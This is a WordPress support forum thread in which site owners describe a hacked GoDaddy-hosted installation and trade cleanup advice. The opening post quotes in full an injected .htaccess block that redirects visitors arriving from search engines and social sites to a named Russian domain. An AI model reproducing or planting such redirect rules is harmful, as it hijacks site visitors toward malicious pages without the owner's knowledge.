WordPress.org

Ready to get started?Download WordPress

Forums

Malicious code in WordPress installations; how remove? (16 posts)

  1. douglasi
    Member
    Posted 2 years ago #

    Any thoughts on what to do about this? Some Russian site has apparently placed malicious code into my installation of WordPress 3.3.1 on a GoDaddy hosted site. When I look at the WordPress code with the editor (and I am not terribly savvy under the hood of WP) I find massive amounts of gobbledygook before the <div> tags encompassing the WP code in just one of my domains, but then suspicious stuff in the .htaccess files of all 6 of them.

    So, I removed all the goobbledygook in all the various php files of the domain where I found it. But when I come to the 'search.php' page in the WP code editor, in the first place the page looks odd -- with the WP nav bar options and text on the left all highlighted in blue in blue rectangles. And when I try to delete the code here and hit 'Update File,' it throws me out of the dashboard to a "Problem Loading the Page' error that includes the address of the Russian site:
    http://daliachu-uaroyalys.ru/industry/index.php

    Here is a look at the 'search.php' page and a glimpse of the gobbledygook:
    http://hundredmountain.com/malicious_code_screenshot.jpg

    Then, when I look at every single .htaccess file for every one of a half-dozen WP installations in folders at my hosted site, they all have the following as the entire code in each of the WP file's .htaccess files with the Russian address included. What I do here?

    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://daliachu-uaroyalys.ru/industry/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://daliachu-uaroyalys.ru/industry/index.php [R=301,L] </IfModule>
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress
    ........
    How do I deal with this?

    Douglas I

  2. deepbevel
    Member
    Posted 2 years ago #

    how-to-completely-clean-your-hacked-wordpress-installation

    There's just no easy way, I advise doing everything it says.

  3. douglasi
    Member
    Posted 2 years ago #

    Thanks for that link, deepbevel. Alas, I have a half-dozen sites (all subfolders of my main domain) that may be infected. Any opinions, experiences by anyone with paying, let's see, $189.99 to Sucuri.net to clean-up 2-5 websites. (GoDaddy, my host, said $190 for 5 sites, too.) Yikes.

    First time this has ever happened to me and just as I was moving toward a possible business launch using some of these sites.

    Douglas

  4. deepbevel
    Member
    Posted 2 years ago #

    It sucks, but sometimes it's not as bad as you think. I had about 12 sites that were hacked. I followed the procedure and I spent about 3 days (maybe 12 hrs total) with the clean up.

    I only bothered to clean malicious code from theme files I had customized, I replaced everything else, except images.

    However I was lucky because only 3 of the sites were published and none had any posts which needed to be saved.

    Good luck, hopfully it won't be so bad :)

  5. mike3even
    Member
    Posted 2 years ago #

    Hi Douglasi,

    Other than the search.php file. What other WordPress files did you spot the encoded script (gobbledygook) on?

    Thanks!

  6. eyefox
    Member
    Posted 2 years ago #

    Hi

    I'm also get malware in Godaddy Linux Hosting Account.

    I have delete all my files in Godaddy Hosting, but when I check in Goolge, malware still there.

    I didn't understand where can be contain Malware without files.My Hosting is empty now, but the problem not solve yet.

    I have email to Godaddy Support, but they can not assist me.

    Please help, I lost everything !
    Thanks

  7. douglasi
    Member
    Posted 2 years ago #

    I received more prompt attention by submitting a support ticket through the hosting manager inside GoDaddy and starting the support ticket like this: 'Please escalate this query as this is a time-sensitive issue affecting a business launch ...' plus mentioning that this attack would lead me to drop GoDaddy as a host. The tech support wrote back within 10 hours and said they'd removed the malicious code but I had to do some other things to plug whatever vulnerability led to the attack. I am still wondering whether it has something to do with GoDaddy and WordPress and whether I should remain hosted there.

    In any case, you might try that route instead of going through their phone tech support or home page support.

    Doug

  8. douglasi
    Member
    Posted 2 years ago #

    Dear mike3even: It was everywhere. A whole page of php gobbledygook code was sitting on a bunch of WordPress files in the 6 installations of WordPress I had in subfolders of my GoDaddy site, plus the .htaccess files also had suspicious re-direct code in them. I am checking now to see if GoDaddy tech support really got it all and wondering whether I need to hire a service to keep this from happening again like sucuri.net. I am also not terribly pleased with a remark Bob Parsons once supposedly said at a GoDaddy gathering that "We're the WalMart of hosting...." Not necessarly a good thing, no? But if their tech support did indeed fix the problem, I will be a little happier. Checking now.

  9. mike3even
    Member
    Posted 2 years ago #

    "A whole page of php gobbledygook code was sitting on a bunch of WordPress files "

    Could you be a bit more specific. Do you remember the infected file names or the folders(wp-content, wp-admin, etc..) they were in?

    I am writing a free tool to clean wordpress installs from this malware thus any additional information would be greatly appreciated.

    Thanks!

  10. Frankthedog
    Member
    Posted 2 years ago #

    The post from deepbevel worked a treat, thanks for that mate!

  11. belimitless
    Member
    Posted 2 years ago #

    Been dealing with this since last friday, a way I found to overcome it is if to roll back to a previous date prior to the attack, change all your passwords & then place every security measure you can. You can only roll back if you are on linux hosting. This was more cost effective and simpler at least for me. Hope that helps

  12. Hydromantic
    Member
    Posted 2 years ago #

    Hi! Same problem here, I post here to get follow up posts in my emails ;)

  13. Charles Kelley
    Member
    Posted 2 years ago #

    Timthumb Vulnerability Scanner. Works like a charm.

  14. eswrite-wp
    Member
    Posted 2 years ago #

    A question: I'm looking for similar malware code in my .php, and though I haven't opened many of the files, I don't see time stamps that are recent. Can I assume those files are untouched, or can a hacker do the swap without affecting time stamps?

  15. MickeyRoush
    Member
    Posted 2 years ago #

    eswrite-wp wrote:

    or can a hacker do the swap without affecting time stamps?

    If they have the right access they can change certain aspects of time stamps. So depending on how you're viewing them, you can't always go by time stamps.

  16. Charles Kelley
    Member
    Posted 2 years ago #

    All, we've found a working fix to this problem. Please, see the whole post here and follow my directions which are more secure that some that others are offering.

    http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked?replies=46#post-2642987

Topic Closed

This topic has been closed to new replies.

About this Topic